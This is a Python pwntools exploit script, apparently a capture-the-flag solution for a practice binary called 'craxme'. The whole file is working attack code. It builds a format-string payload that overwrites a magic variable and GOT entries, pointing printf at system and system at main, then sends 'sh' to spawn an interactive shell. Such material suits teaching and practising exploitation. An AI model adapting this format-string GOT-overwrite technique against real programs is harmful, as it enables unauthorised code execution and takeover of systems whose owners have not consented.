#!/usr/bin/env python

from pwn import *
import os
path_to_fmtexp = os.environ['package'] # export package="/path/to/directory/of/FormatStringExploit.py"
sys.path.append(path_to_fmtexp)
from FormatStringExploit import *

r = process('./craxme')

# Address setup
puts_got = 0x804a018
system_jmp = 0x8048416
system_got = 0x804a01c
printf_got = 0x804a010
main = 0x0804854b
magic = 0x0804a038

# FormatString object setup
magic_fmt = FmtStrExp(0, magic, 0xda)
printf_got_fmt = FmtStrExp(0, printf_got, system_jmp)
system_got_fmt = FmtStrExp(0, system_got, main)

# Generate payload
total_fmt = {magic_fmt: 1, printf_got_fmt: 4, system_got_fmt: 4}
superpayload = fmt_payload(total_fmt, 7, 32)
r.sendline(superpayload)

# Get shell
sleep(1)
r.sendline('sh\x00')

r.interactive()
